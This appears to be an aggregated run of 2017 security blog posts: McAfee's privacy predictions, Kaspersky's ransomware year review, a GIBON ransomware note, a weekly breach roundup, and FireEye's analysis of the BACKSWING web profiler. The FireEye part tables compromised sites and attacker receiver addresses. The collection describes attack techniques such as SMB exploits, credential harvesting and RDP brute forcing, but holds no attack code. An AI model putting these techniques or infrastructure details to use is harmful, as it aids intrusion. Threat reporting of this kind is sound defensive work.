We have seen numerous examples of corporate malfeasance in recent years. A flashlight app developer’s license agreement did not disclose that the app gathered geolocation data. Three years ago, a video game hardware company pushed an update with no option to refuse; users had to agree to new terms or stop using the product they had purchased. In many agreements, users “agree” to all future changes that the company makes unilaterally to the terms: “Continued use of the service after any such changes shall constitute your consent to such changes.”

In July, the US Federal Bureau of Investigation warned parents to be wary of connected children’s toys that could be capable of collecting their children’s personally identifiable information.

Businesses will continue to seek to understand what and how consumers consume in the privacy of their homes, certainly requiring more user data than consumers will likely be comfortable sharing. McAfee asserts that a substantial number of corporations will break privacy laws, pay fines, and still continue such practices, thinking they can do so profitably. But the FBI’s recent toy warning to parents might suggest that such approaches could result in regulatory and even criminal legal consequences.

Next year will provide new examples of how well, and how badly, corporations are able to navigate the temptations and opportunities presented by connected homes.

We thank the Electronic Frontier Foundation for their assistance with this article.

Inside Your Child’s Digital Backpack

Protecting your children from corporate abuse of their user-generated content

It seems that every product, service, or experience we interact with today creates some type of digital record, whether or not we like it. As adults, we are gradually coming to terms with this effect and learning to manage our digital lives, but what about our children? Employers are already making hiring decisions influenced by search results. Could this extend to schools, health care, and governments? Will children be denied entry to a school because of how much time they spent binge-watching videos, or find it difficult to run for office because of a video made when they were seven?

Online information, or digital baggage, can be positive, negative, or neutral. As our children go on their increasingly digital journey through life, what are they packing for their trip? Likely, it will be a combination of mostly innocuous and trivial things, some positive and amazing ones that will help them on their journey, and some negative items that could weigh them down. Unfortunately, we predict that many future adults will suffer from negative digital baggage, even if it comes about without their intention.

As parents, our challenge is to help our children navigate this new world, in which they can be tracked almost from the moment of conception. Remember that story from 2012 about a girl who received coupons from a retailer for pregnancy-related items before she acknowledged that she was pregnant?

To help our children, we need to understand the kinds of digital artifacts that are being captured and stored. There are generally three types: explicit, implicit, and inadvertent.

Explicit content is all of those things that happen after you click the “I Agree” button on the terms and conditions or end user license agreement. Given recent breaches, it seems that anything stored online will at some point be hacked, so why not assume that from the beginning? If they really want to, a prospective employer may be able to find out what content you created, your social habits, and a host of other data points. This is an area that parents (at least initially) have a lot of control and influence over, and can teach and model good habits. Are you buying “M”-rated games for your 10-year-old, or letting your teens post videos without some oversight? Sadly, what happens online is not private, and there could eventually be consequences.

Implicit content is anything you do or say in an otherwise public place, which could be photographed, recorded, or somehow documented. This ranges from acting silly to drinking or taking drugs, but also includes what people say, post, tweet, etc. in public or online. We do not think that childlike behavior (by children) is going to be frequently or successfully used against people in the future, so we can still let our kids be kids.

Inadvertent content is the danger area. These are items that were intended to remain private, or were never expected to be captured. Unfortunately, inadvertent content is becoming increasingly common, as organizations of all types (accidentally or on purpose) bend and break their own privacy agreements in a quest to capture more about us. Whether with a toy, a tablet, a TV, a home speaker, or some other device, someone is capturing your child’s words and actions and sending them to the cloud. This is the most challenging part of the digital journey, and one that we must manage vigilantly. Pay attention to what you buy and install, turn off unnecessary features, and change the default passwords to something much stronger!

Our children face an amazing potential future, full of wonderful gadgets, supportive services, and amazing experiences. Let’s teach them at home to pack their digital backpacks so that they can make the most of it.

In the corporate world, McAfee predicts that the May 2018 implementation of the European Union’s General Data Protection Regulation (GDPR) could play an important role in setting ground rules on the handling of both consumer data and user-generated content in the years to come. The new regulatory regime impacts companies that either have a business presence in EU countries, or process the personal data of EU residents, meaning that companies from around the world will be compelled to adjust the way in which they process, store, and protect customers’ personal data. Forward-looking businesses can leverage this to set best practices that benefit customers using consumer appliances, content-generating app platforms, and the online cloud-based services behind them.

In this regard, the year 2018 may well best be remembered for whether consumers truly have the right to be forgotten.

To find out more about the data protection opportunity for businesses, visit McAfee’s GDPR site.

For more on how to protect your children from potential user-generated content abuse and other digital threats, please see McAfee’s blogs for guidance on parenting in the digital age.

Contributors

  • Christiaan Beek
  • Lisa Depew
  • Magi Diego
  • Daren Dunkel
  • Celeste Fralick
  • Paula Greve
  • Lynda Grindstaff
  • Steve Grobman
  • Kenneth Howard
  • Abhishek Karnik
  • Sherin Mathews
  • Jesse Michael
  • Raj Samani
  • Mickey Shkatov
  • Dan Sommer
  • Vincent Weafer
  • Eric Wuehler
  • Jonathan King

 

About McAfee Labs

McAfee Labs is one of the world’s leading sources for threat research, threat intelligence, and cybersecurity thought leadership. With data from millions of sensors across key threats vectors—file, web, message, and network—McAfee Labs delivers real-time threat intelligence, critical analysis, and expert thinking to improve protection and reduce risks.

To learn more about our predictions for 2018, register for our January 9th webcast.

The post ‘McAfee Labs 2018 Threats Predictions Report’ Previews Five Cybersecurity Trends appeared first on McAfee Blogs.

Kaspersky Security Bulletin: Story of the year 2017

 Download the Kaspersky Security Bulletin: Story of the year 2017

Introduction: what we learned in 2017

In 2017, the ransomware threat suddenly and spectacularly evolved. Three unprecedented outbreaks transformed the landscape for ransomware, probably forever. The attacks targeted businesses and used worms and recently leaked exploits to self-propagate, encrypting data and demanding a ransom they didn’t really want. The perpetrators of these attacks are unlikely to be the common thieves usually lurking behind ransomware. At least one of the attacks carried flaws that suggest it may have been released too soon, another spread via compromised business software, two are related and the two biggest appear to have been designed for data destruction. The cost to victims of these three attacks is already running into hundreds of millions of dollars.

Welcome to ransomware in 2017 – the year global enterprises and industrial systems were added to the ever-growing list of victims, and targeted attackers started taking a serious interest in the threat. It was also a year of consistently high attack numbers, but limited innovation.

This short paper highlights some of the key moments.

The massive outbreaks that were not all they seemed

WannaCry

It all started on May 12, when the security community observed something it hadn’t seen for almost a decade: a cyberattack with a worm that spread uncontrollably. On this occasion the worm was designed to install the WannaCry crypto-ransomware on infected machines.

The WannaCry epidemic affected hundreds of thousands of computers around the globe. To propagate, the worm used an exploit dubbed EternalBlue and a backdoor DoublePulsar, both of which had been made public by the Shadow Brokers group a month prior to the outbreak. The worm automatically targeted all computers sharing the same local subnet as the infected machine, as well as random IP ranges outside the local network – spreading it rapidly across the world.

To infect a machine, WannaCry exploited a vulnerability in the Windows implementation of the SMB protocol. Microsoft had released an update to fix this vulnerability back in March 2017, but the number of unpatched machines remained so high that this hardly hindered the propagation of WannaCry.

After infecting a machine and executing a routine to spread further, WannaCry encrypted some valuable files belonging to the victim and displayed a ransom note. Full decryption of the affected files was impossible without paying the ransom – although our analysts discovered several flaws in WannaCry’s code that could allow some victims to restore some of their data without paying the ransom.

Impact of WannaCry

The attack was industry-agnostic, and victims were mainly organizations with networked systems. The ransomware also hit embedded systems. These often run on legacy OS and are therefore particularly vulnerable. Victims received a ransom demand to be paid in bitcoins. Reports suggests the ultimate number of victims could be as high as three-quarters of a million.

Car maker Renault had to close its largest factory in France and hospitals in the UK had to turn away patients. German transport giant Deutsche Bahn, Spain’s Telefónica, the West Bengal power distribution company, FedEx, Hitachi and the Russian Interior Ministry were all hit, too. A month after the initial outbreak had been contained, WannaCry was still claiming victims, including Honda, which was forced to shut down one of its production facilities, and 55 speed cameras in Victoria, Australia.

The unanswered questions about WannaCry

As a devastating high profile attack targeting businesses, WannaCry was extremely successful. As a ransomware plot to make lots of money, it was a failure. Spreading via a worm is not advisable for a threat that is most lucrative when silently stalking the shadows. Estimates suggest it only made around $55,000 in bitcoin, hampered by its high visibility. The code was poor in places, and there are suggestions that it escaped into the wild before it was fully ready. There are also a number of indicators, including early code similarities that suggest the group behind WannaCry is the infamous Korean-speaking threat actor Lazarus.

The true purpose of the WannaCry attack may never be known – was it ransomware gone wrong or a deliberate destructive attack disguised as ransomware?

ExPetr

The second big attack came just six weeks later, on June 27. This was spread predominantly through a supply chain infection and targeted machines mainly in Ukraine, Russia and western Europe. The company’s telemetry indicates that there were more than 5,000 attacked users. Victims received a ‘ransom demand’ of around $300, to be paid in bitcoins – although it turned out that even then they couldn’t get their files back.

ExPetr was a complex attack, involving several vectors of compromise. These included modified EternalBlue (also used by WannaCry) and EternalRomance exploits and the DoublePulsar backdoor for propagation within the corporate network; compromised MeDoc accounting software, which distributed the malware through software updates; and a compromised news website for Ukraine’s Bakhmut region that was used as a watering hole by the attackers.

What’s more, ExPetr was capable of spreading even to properly patched machines in the same local network as the initially infected computer. To do that, it harvested credentials from the infected system by means of a Mimikatz-like tool and proceeded with its lateral movement by means of the PsExec or WMIC instruments.

The encrypting component of ExPetr operated on two levels: encrypting the victim’s files with the AES-128 algorithm and then installing a modified bootloader taken from another malicious program – GoldenEye (the successor of the original Petya). This malicious bootloader encrypted the MFT, a critical data structure of the NTFS file system, and prevented further boot processes, asking for a ransom.

Impact of ExPetr

Victims of ExPetr included major organizations such as shipping ports, supermarkets, ad agencies and law firms: for example, Maersk, FedEx (TNT) and WPP. A month after the attack, TNT’s deliveries were still affected, with SMB customers suffering most. Another victim, consumer goods giant Reckitt Benckiser, lost access to 15,000 laptops, 2,000 servers and 500 computer systems in the space of just 45 minutes when the attack hit – and expects the cost to the business to be over $130 million. Maersk announced a revenue loss of around $300 million due to the attack.

The unanswered questions about ExPetr

Kaspersky Lab experts have found similarities between ExPetr and early variants of BlackEnergy’s KillDisk code – but the true motivation and purpose behind ExPetr also remain unknown.

BadRabbit

Then, in late October, another crypto-worm, BadRabbit, appeared. The initial infection started as a drive-by download served from a number of compromised websites and mimicking an update for Adobe Flash Player. When launched on a victim’s computer, BadRabbit’s worm component attempted to self-propagate using the EternalRomance exploit and to employ a lateral movement technique similar to the one utilized by ExPetr. Most of BadRabbit’s targets were located in Russia, Ukraine, Turkey and Germany.

The ransomware component of BadRabbit encrypted the victim’s files, followed by the whole disk partitions using modules of legitimate utility DiskCryptor. The analysis of the code of BadRabbit samples and techniques suggests there is a notable similarity between this malware and ExPetr. However, unlike ExPetr, BadRabbit does not appear to be a wiper, as its cryptographic scheme technically allows the threat actors to decrypt the victim’s computer.

Leaked exploits powered many new waves of attacks

The criminals behind the aforementioned ransomware outbreaks were not the only ones to use the code of exploits leaked by the Shadow Brokers to wreak havoc.

We have discovered some other not-so-notorious ransomware families that at some point used the same exploits. Among them are AES-NI (Trojan-Ransom.Win32.AecHu) and Uiwix (a variant of Trojan-Ransom.Win32.Cryptoff). These malware families are ‘pure’ ransomware in the sense that they do not contain any worm capabilities, i.e. cannot self-replicate, which is why they did not spread nearly as widely as WannaCry, for instance. However, the threat actors behind these malware families exploited the same vulnerabilities on victims’ computers during the initial infections.

Master keys released for several ransomware families

Apart from the large-scale epidemics that shook the world, in Q2 2017 an interesting trend emerged: several criminal groups behind different ransomware cryptors concluded their activities and published the secret keys needed to decrypt victims’ files.

Below is the list of families for which keys became public in Q2:

  • Crysis (Trojan-Ransom.Win32.Crusis);
  • AES-NI (Trojan-Ransom.Win32.AecHu);
  • xdata (Trojan-Ransom.Win32.AecHu);
  • Petya/Mischa/GoldenEye (Trojan-Ransom.Win32.Petr).

The Petya/Mischa/GoldenEye master key was released shortly after the outbreak of ExPetr and might have been an attempt by the original Petya authors to show that they were not the ones behind ExPetr.

The reappearance of Crysis

Despite the fact that the Crysis ransomware appeared to die in May 2017 following the release of all the master keys, it didn’t stay dead for long. In August, we started discovering numerous new samples of this ransomware and they turned out to be almost identical copies of the previously distributed samples, with only a few differences: they had new master public keys, new email addresses that victims were supposed to use to contact the criminals, and new extensions for the encrypted files. Everything else remained unchanged – even the timestamps in the PE headers. After thorough analysis of the old and new samples, our analysts concluded that most likely the new samples were created by binary patching the old ones using a hex editor. One reason for this might be that the criminals behind the new samples didn’t possess the source code and simply reverse-engineered the ransomware to raise it from the dead and use it for their own ends.

RDP infections continue to grow

In 2016, we noticed a new emerging trend among the most widespread ransomware. Instead of trying to trick the victim into launching a malicious executable or using exploit kits, the criminals turned to another infection vector. They were brute-forcing the RDP logins and passwords on machines that had RDP turned on and that were available for access from the Internet.

In 2017, this approach became one of the main propagation methods for several widespread families, such as Crysis, Purgen/GlobeImposter and Cryakl. This means that when securing a network, InfoSec specialists should keep this vector in mind and block RDP access from outside the corporate network.

Ransomware: a year in numbers

It is important not to read too much into the absolute numbers as they reflect changes in detection methodology as much as they do evolution of the landscape. Having said that, a few top line trends are worth noting:

  • The level of innovation appears to be declining – in 2017, 38 new strains of encryption ransomware were deemed interesting and different enough to be designated as new ‘families’, compared to 62 in 2016. This could be due to the fact that the crypto-ransomware model is fairly limited and it is becoming progressively more difficult for malware developers to invent something new.
  • There were many more modifications of new and existing ransomware detected in 2017: over 96,000 compared to 54,000 in 2016. The rise in modifications may reflect attempts by attackers to obfuscate their ransomware as security solutions get better at detecting them.
  • The number of attacks as defined by hits against Kaspersky Lab customers remained fairly constant. In fact, the big spikes of 2016 have been replaced with a more consistent monthly spread. Overall, just under 950,000 unique users were attacked in 2017, compared to around 1.5 million in 2016. However, this data includes both encryptors and their downloaders; if you look at the numbers for encryptors only, the attack data for 2017 is similar to 2016. This makes sense if you consider that many attackers are starting to distribute their ransomware through other means, such as brute-forcing passwords and manual launching. These numbers do not include the many computers around the world unprotected by our solutions that fell victim to WannaCry – this number has been estimated at around 727,000 unique IP addresses.
  • WannaCry, ExPetr and BadRabbit notwithstanding, the number of attacks targeting corporates increased only slightly: 26.2% in 2017 compared to 22.6% in 2016. Just over 4% of those targeted in 2017 were SMBs.

Further details on these trends, including the most affected countries and top ransomware families, can be found in the Kaspersky Security Bulletin 2017 Statistics Report.

According to Kaspersky Lab’s annual IT security survey

  • 65% of businesses that were hit by ransomware in 2017 said they lost access to a significant amount or even all their data; while 29% said that although they were able to decrypt their data, a significant number of files were lost forever. These figures are largely consistent with those for 2016.
  • 34% of those affected took a week if not more to restore full access, up from 29% in 2016.
  • 36% paid the ransom – but 17% of them never recovered their data (32 and 19% in 2016).

Conclusion: what next for ransomware?

In 2017, we saw ransomware apparently being used by advanced threat actors to mount attacks for data destruction rather than for pure financial gain. The number of attacks on consumers, SMBs and enterprises remained high, but they mainly involved existing or modified code from known or generic families.

Is the ransomware business model starting to crack? Is there a more lucrative alternative for cybercriminals motivated by financial gain? One possibility could be cryptocurrency mining. Kaspersky Lab’s threat predictions for cryptocurrencies in 2018 suggest a rise in targeted attacks for the purpose of installing miners. While ransomware provides a potentially large but one-off income, miners can result in lower but longer earnings, and this could be a tempting prospect for many attackers in ransomware’s current turbulent landscape. But one thing’s for sure, ransomware won’t just disappear – neither as a direct threat, nor as a disguise for deeper attacks.

The fight against ransomware continues

  • Through collaboration: On July 25, 2016, the No More Ransom initiative was launched by Kaspersky Lab, the Dutch National Police, Europol, and McAfee. It is a unique example of the power of joint public-private collaboration to both fight cybercriminals and help their victims with expertise, tips and decryption tools. One year on, the project has 109 partners and is available in 26 languages. The online portal carries 54 decryption tools, which between them cover 104 families of ransomware. To date, more than 28,000 devices have been decrypted, depriving cybercriminals of an estimated US$9.5 million in ransom.
  • Through intelligence: Kaspersky Lab has monitored the ransomware threat from the start, and was one of the first to provide regular threat intelligence updates on extortion malware in order to boost industry awareness. The company publishes regular overviews of the evolving ransomware landscape, for instance, here and here.
  • Through technology: Kaspersky Lab offers multi-layered protection against this widespread and increasing threat, including a free anti-ransomware tool that anyone can download and use, regardless of the security solution they use. The company’s products include a further layer of technology: System Watcher that can block and roll back malicious changes made on a device, such as the encryption of files or blocked access to the monitor.

Uber bezahlte Hacker, um Datendiebstahl bei 57 Millionen Betroffenen zu vertuschen

Das US-Unternehmen Uber erlitt im Oktober 2016 einen massiven Datendiebstahl. 57 Millionen Fahrer- und Kunden-Konten waren davon betroffen. Uber hielt diesen Datenverlust nicht nur gegenüber den Betroffenen geheim, sondern bezahlte den Hackern 100.000 US-Dollar, damit diese die Daten löschen und darüber schweigen sollten. Die gehackten Daten umfassen Emailadressen und Telefonnummer der Kunden und persönliche Informationen […]

Ransomware bleibt ein Problem – nicht nur für Windows

Ransomware hat Unternehmen und Privatanwender in diesem Jahr auffällig zugesetzt. SophosLabs kommt nach seiner Analyse von Daten aus April bis Oktober 2017 zur Prognose, dass auch das nächste Jahr von Ransomware und Ransomware as a Service (RaaS) inkl. Do-it-yourself-Bausätzen geprägt sein wird. Neben Windows müssen sich zukünftig allerdings auch Linux, Mac und Android User wappnen. […]

How GIBON Ransomware Created a Benchmark for Response Time

We all remember WannaCry and Petya. How could you forget them? Their rampant spread and malicious maneuvers are burned into memory. But there was one upside to the nasty ransomware campaigns – we learned from them. We adapted and we got agile. So when GIBON ransomware came into town, we were ready to rumble.

Meet GIBON: a new ransomware strain currently for sale on dark web forums for $500 USD. (It gets its name due to a user string of “GIBON” when the malware connects to its command-and-control (C&C) server, as well as the ransomware’s administration panel where it calls itself “Encryption Machine GIBON.”)

It makes its way from forums to victims’ devices through phishing emails containing macros that download and execute the malware payload on a victim’s PC. Then, GIBON connects to the C&C server, passing along a base64 encoded string with a timestamp and registers the string in order to record the new victim. Following that, it generates an encryption key, and begins locking up any file it can find on a device only to return them for, of course, a fee paid in cryptocurrency. Once every file is encrypted, the strain reports back to the boss, letting the C&C server know it’s finished so it can timestamp the event and a record of the number of files encrypted. Simple enough.

GIBON, like many ransomware strains, proves that these attacks don’t have to be very complicated in order to be effective. However, that effectiveness has dwindled in recent attack campaigns. In fact, a decryptor is already available for GIBON — which represents a benchmark for our response time to these attacks.

Christiaan Beek, lead scientist and principal engineer at McAfee, says response time is only improving. “The cybersecurity world is indeed responding faster than before, especially after WannaCry, which was another wake-up call… The moment researchers see that a decryptor is available, we go on and continue to hunt down the next one or learn from the previous ones and start innovating or fine-tuning our products.” Beek continues, “Ransomware has sparked and forced the infosec industry to think and innovate about solutions more than other malware-related threats.”

Basically, the industry now more than ever is expediting how cybersecurity professionals adapt to threats and how quickly they apply learnings to the next go around. White hats are becoming faster in the race against cybercrime, and increasing their chances of eventually getting ahead of these threats.

That’s exactly why we created McAfee Ransomware Recover (Mr 2), a new ransomware decryption framework, which will allow for the rapid incorporation of decryption keys and custom decryption logic (when they become available) and gets help to victims of ransomware a lot quicker. That way, we can continue to combat these threats quickly and effectively, and put ourselves in the best position possible to win the fight against cybercrime.

To learn more about GIBON ransomware, and others like it, be sure to follow @McAfee and @McAfee_Labs on Twitter.

The post How GIBON Ransomware Created a Benchmark for Response Time appeared first on McAfee Blogs.

Malware-Aussichten 2018: Android, nimm dich in Acht vor Ransomware!

2017 ist fast schon wieder Geschichte und damit beginnt die Saison der Jahresrückblicke. SophosLabs hat die Schadware in 2017 analysiert und Prognosen erstellt. Ein dominantes Security-Thema in 2017 ist Malware für Mobilgeräte, vornehmlich für Android. SophosLabs analysierte, dass es bis Ende 2017 geschätzte 10 Millionen verdächtige Android-Apps geben wird, darunter auch Ransomware, wie sie beispielsweise […]

Weekly Cyber Risk Roundup: Bad Rabbit Halted, Law Firm Breach Raises Questions

The week’s top trending event was the outbreak of Bad Rabbit ransomware, which quickly spread across Russia and Eastern Europe before most of the infrastructure behind the attack was taken offline hours later. 

2017-10-28_ITT.PNG

Bad Rabbit was largely spread via watering hole attacks using compromised news media websites that prompted users to install a fake “Flash Update.” Symantec reported that the vast majority of infection attempts occurred in Russia within the first two hours of the malware’s appearance, but there were also infection attempts observed in Japan, Bulgaria, Ukraine, the U.S., and other countries.

The malware used an SMB component as well as the “Mimikatz” tool, along with some hard-coded default usernames and passwords, to attempt to spread laterally across a network after infection. It was later discovered that the malware also leveraged the leaked NSA exploit EternalRomance in a way that was “very similar to the publicly available Python implementation of the EternalRomance exploit” used by NotPetya (or Nyeta) malware.

“The BadRabbit exploit implementation is different than the one in Nyetya, although it is still largely based on the EternalRomance exploit published in the ShadowBrokers leak,” Cisco researchers wrote. “We can be fairly confident that BadRabbit includes an EternalRomance implementation used to overwrite a kernel’s session security context to enable it to launch remote services, while in Nyetya it was used to install the DoublePulsar backdoor.”

Those infected with Bad Rabbit were directed to a Tor payment page and presented with a countdown timer for when the ransom demand would increase, starting at 0.05 bitcoin (around $280). The Register reported that various researchers have found that recovering infected machines appeared difficult, but not impossible.

2017-10-28_ITTGroups

Other trending cybercrime events from the week include:

  • TheDarkOverlord targets surgery clinic: TheDarkOverlord said it has stolen terabytes of data from London Bridge Plastic Surgery, including sensitive photos and information on some high-profile clients. “We have TBs [terabytes] of this shit. Databases, names, everything,” a representative from The Dark Overlord told The Daily Beast. “There are some royal families in here.” The clinic confirmed that it was likely breached and said it has launched an investigation into the stolen data.
  • Cryptocurrency-related cybercrime: A phishing scam impersonating MyEtherWallet managed to trick several users into handing over the passwords to their wallets, and as a result approximately $16,000 was stolen. Coinhive, which provides websites with a JavaScript miner, said that its Cloudflare account was hijacked due to the use of an insecure password and lack of two-factor authentication, and as a result the attacker was able to steal hashes from users. Coincafe said that an unauthorized third party gained access to a system that was decommissioned in 2014 containing customers’ personal information, and the third party then contacted some of those customers and said they would erase their compromised data for a fee. The website for the new cryptocurrency Bitcoin Gold was taken offline by a DDoS attack.
  • Updates on previously disclosed breaches: Whole Foods said its payment card breach affected nearly 100 locations. U.S. Cellular said an investigation into automated attacks against online user accounts in June revealed that the incident also exposed bank account and routing numbers. West Music, which operates westmusic.com and percussionsource.com, is the latest company to notify customers of a payment card breach tied to third-party payment processor Aptos. Alliance College-Ready Public Schools said they are one of multiple school districts and charter networks affected by a vulnerability that exposed information from the school data platform Schoolzilla. The NSA contractor tied to the leak of confidential hacking tools allegedly disabled his antivirus and infected his computer with malware when installing a pirated version of Microsoft Office.
  • Other notable events: A contractor lost control of a Dell customer support website designed to help customers restore their data and computers to their factory default state, and the hijacked website may have been used to push malware while it was compromised. Researchers discovered two publicly exposed MongoDB databases belonging to Tarte Cosmetics that contained the personal information of nearly two million customers. FirstHealth of the Carolinas, which has more than 100 physical locations, said that a WannaCry variant forced the shutdown of its network to prevent the malware from spreading. Memory4Less is notifying customers that their personal information may have compromised due to an unauthorized user installing malware on its network between November 2016 and September 2017. LightHouse Management Services and the Iowa Department of Human Services announced employee email account breaches. COL Financial Group said it has experienced a “possible breach.” Two websites run by the Czech Statistical Office that reported the results of the country’s parliamentary elections were temporarily taken offline by DDoS attacks.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of those “newly seen” targets, meaning they either appeared in SurfWatch Labs’ data for the first time or else reappeared after being absent for several weeks, are shown in the chart below.

2017-10-28_ITTNew

Cyber Risk Trends From the Past Week

2017-10-28_RiskScoresThe offshore law firm Appleby said that client data was stolen last year, and the International Consortium of Investigative Journalists (ICIJ), which obtained the hacked data, has contacted the firm over allegations of wrongdoing and says it plans on publishing a series of stories related to the breach.

Business Insider reported that the law firm’s super-rich clients are “bracing themselves for the exposure of their financial secrets.” The incident has echoes of the 2016 “Panama Papers” leak, which involved the Panama-based law firm Mossack Fonseca and has led to numerous consequences around the globe — including the resignation of prime ministers in Iceland and Pakistan, and calls for the impeachment of Ukraine’s president.

It is unclear at the moment what fallout, if any, may occur due the breach at Bermuda-based Appleby, and it is important to note that the company said in a statement that it has found no evidence of wrongdoing.

“We are disappointed that the media may choose to use information which could have emanated from material obtained illegally and that this may result in exposing innocent parties to data protection breaches,” the company said. “Having researched the ICIJ’s allegations we believe they are unfounded and based on a lack of understanding of the legitimate and lawful structures used in the offshore sector.”

However, there have already been reports that leak has led to renewed scrutiny of Glencore Plc’s acquisition of Katanga Mining Ltd., which runs copper and cobalt mines in Congo, and claims that aircraft buyers may have used Isle of Man for abusive Value Added Tax (VAT) avoidance.

Appleby’s clients include FTSE 100 and Fortune 500 companies, and the breach serves as a reminder that law firms are often the target of malicious actors due to the combination of sensitive documents they hold along with the potentially weaker security inherent in some third parties. Additional documents and reporting related to the Appleby breach will likely be published throughout the coming months.


BACKSWING – Pulling a BADRABBIT Out of a Hat

Executive Summary

On Oct. 24, 2017, coordinated strategic web compromises started to distribute BADRABBIT ransomware to unwitting users. FireEye appliances detected the download attempts and blocked our user base from infection. During our investigation into the activity, FireEye identified a direct overlap between BADRABBIT redirect sites and sites hosting a profiler we’ve been tracking as BACKSWING. We’ve identified 51 sites hosting BACKSWING and four confirmed to drop BADRABBIT. Throughout 2017, we observed two versions of BACKSWING and saw a significant increase in May with an apparent focus on compromising Ukrainian websites. The pattern of deployment raises the possibility of a strategic sponsor with specific regional interests and suggest a motivation other than financial gain. Given that many domains are still compromised with BACKSWING, we anticipate that there is a risk that they will be used for future attacks.

Incident Background

Beginning on Oct. 24 at 08:00 UTC, FireEye detected and blocked attempts to infect multiple clients with a drive-by download masquerading as a Flash Update (install_flash_player.exe) that delivered a wormable variant of ransomware. Users were redirected to the infected site from multiple legitimate sites (e.g. http://www.mediaport[.]ua/sites/default/files/page-main.js) simultaneously, indicating a coordinated and widespread strategic web compromise campaign.

FireEye network devices blocked infection attempts at over a dozen victims primarily in Germany, Japan, and the U.S. until Oct. 24 at 15:00 UTC, when the infection attempts ceased and attacker infrastructure – both 1dnscontrol[.]com and the legitimate websites containing the rogue code – were taken offline.

BACKSWING Framework Likely Connected to BADRABBIT Activity

Strategic web compromises can have a significant amount of collateral targeting. It is common for threat actors to pair a strategic web compromise with profiling malware to target systems with specific application versions or victims. FireEye observed that BACKSWING, a malicious JavaScript profiling framework, was deployed to at least 54 legitimate sites starting as early as September 2016.  A handful of these sites were later used to redirect to BADRABBIT distribution URLs.

FireEye iSIGHT Intelligence tracks two distinct versions of BACKSWING that contain the same functionality, but differ in their code styles. We consider BACKSWING a generic container used to select attributes of the current browsing session (User-Agent, HTTP Referrer, Cookies, and the current domain). This information is then relayed to a “C2” sometimes to referred to as a “receiver.” If the receiver is online, the server returns a unique JSON blob to the caller which is then parsed by the BACKSWING code (Figure 1).


Figure 1: BACKSWING Reply

BACKSWING anticipates the JSON blob to have two fields, “InjectionType” (expected to be an integer) and “InjectionString” (expected to be string containing HTML content). BACKSWING version 1 (Figure 2) explicitly handles the value of “InjectionType” into two code paths:

  • If InjectionType == 1 (Redirect browser to URL)
  • If InjectionType != 1 (render HTML into the DOM)


Figure 2: Backswing Version 1

In Version 2 (Figure 3), BACKSWING retains similar logic, but generalizes the InjectionString to be handled strictly to render the reply into the DOM.


Figure 3: BACKSWING Version 2

Version 1:

  • FireEye observed the first version of BACKSWING in late 2016 on websites belonging to a Czech Republic hospitality organization in addition to a government website in Montenegro. Turkish-tourism websites were also injected with this profiler.
  • BACKSWING v1 was commonly injected in cleartext to affected websites, but over time, actors began to obfuscate the code using the open-source Dean-Edwards Packer and injected it into legitimate JavaScript resources on affected websites. Figure 4 shows the injection content.
  • Beginning in May 2017, FireEye observed a number of Ukrainian websites compromised with BACKSWING v1, and in June 2017, began to see content returned from BACKSWING receivers.
  • In late June 2017, BACKSWING servers returned an HTML div element with two distinct identifiers. When decoded, BACKSWING v1 embedded two div elements within the DOM with values of 07a06a96-3345-43f2-afe1-2a70d951f50a and 9b142ec2-1fdb-4790-b48c-ffdf22911104. No additional content was observed in these replies.


Figure 4: BACKSWING Injection Content

Version 2:

  • The earliest that FireEye observed BACKSWING v2 occurred on Oct. 5, 2017 across multiple websites that previously hosted BACKSWING v1
  • BACKSWING v2 was predominantly injected into legitimate JavaScript resources hosted on affected websites; however, some instances were injected into the sites’ main pages
  • FireEye observed limited instances of websites hosting this version were also implicated in suspected BADRABBIT infection chains (detailed in Table 1).

Malicious profilers allow attackers to obtain more information about potential victims before deploying payloads (in this case, the BADRABBIT “flash update” dropper). While FireEye has not directly observed BACKSWING delivering BADRABBIT, BACKSWING was observed on multiple websites that were seen referring FireEye customers to 1dnscontrol[.]com, which hosted the BADRABBIT dropper. 

Table 1 highlights the legitimate sites hosting BACKSWING that were also used as HTTP referrers for BADRABBIT payload distribution.

Compromised Website

BACKSWING Receiver

BACKSWING Version

Observed BADRABBIT Redirect

blog.fontanka[.]ru

Not Available

Not Available

1dnscontrol[.]com

www.aica.co[.]jp

http://185.149.120[.]3/scholargoogle/

v2

1dnscontrol[.]com

www.fontanka[.]ru

http://185.149.120[.]3/scholargoogle/

v2

1dnscontrol[.]com

www.mediaport[.]ua

http://172.97.69[.]79/i/

v1

1dnscontrol[.]com

www.mediaport[.]ua

http://185.149.120[.]3/scholargoogle/

v2

1dnscontrol[.]com

www.smetkoplan[.]com

http://172.97.69[.]79/i/

v1

1dnscontrol[.]com

www.smetkoplan[.]com

http://38.84.134[.]15/Core/Engine/Index/default

v1

1dnscontrol[.]com

www.smetkoplan[.]com

http://185.149.120[.]3/scholargoogle/

v2

1dnscontrol[.]com

Table 1: Sites hosting BACKSWING profilers and redirected users to a BADRABBIT download site

The compromised websites listed in Table 1 demonstrate one of the first times that we have observed the potential weaponization of BACKSWING. FireEye is tracking a growing number of legitimate websites that also host BACKSWING underscoring a considerable footprint the actors could leverage in future attacks. Table 2 provides a list of sites also compromised with BACKSWING

Compromised Website

BACKSWING Receiver

BACKSWING Version

akvadom.kiev[.]ua

http://172.97.69[.]79/i/

v1

bahmut.com[.]ua

http://dfkiueswbgfreiwfsd[.]tk/i/

v1

bitte.net[.]ua

http://172.97.69[.]79/i/

v1

bon-vivasan.com[.]ua

http://172.97.69[.]79/i/

v1

bonitka.com[.]ua

http://172.97.69[.]79/i/

v1

camp.mrt.gov[.]me

http://38.84.134[.]15/Core/Engine/Index/two

v1

Evrosmazki[.]ua

http://172.97.69[.]79/i/

v1

forum.andronova[.]net

http://172.97.69[.]79/i/

v1

forum.andronova[.]net

http://91.236.116[.]50/Core/Engine/Index/two

v1

grandua[.]ua

http://172.97.69[.]79/i/

v1

grupovo[.]bg

http://185.149.120[.]3/scholargoogle/

v2

hr.pensionhotel[.]com

http://38.84.134[.]15/Core/Engine/Index/default

v1

i24.com[.]ua

http://172.97.69[.]79/i/

v1

i24.com[.]ua

http://185.149.120[.]3/scholargoogle/

v2

icase.lg[.]ua

http://172.97.69[.]79/i/

v1

montenegro-today[.]com

http://38.84.134[.]15/Core/Engine/Index/two

v1

montenegro-today[.]ru

http://172.97.69[.]79/i/

v1

most-dnepr[.]info

http://172.97.69[.]79/i/

v1

most-dnepr[.]info

http://185.149.120[.]3/scholargoogle/

v2

obereg-t[.]com

http://172.97.69[.]79/i/

v1

sarktur[.]com

http://104.244.159[.]23:8080/i

v1

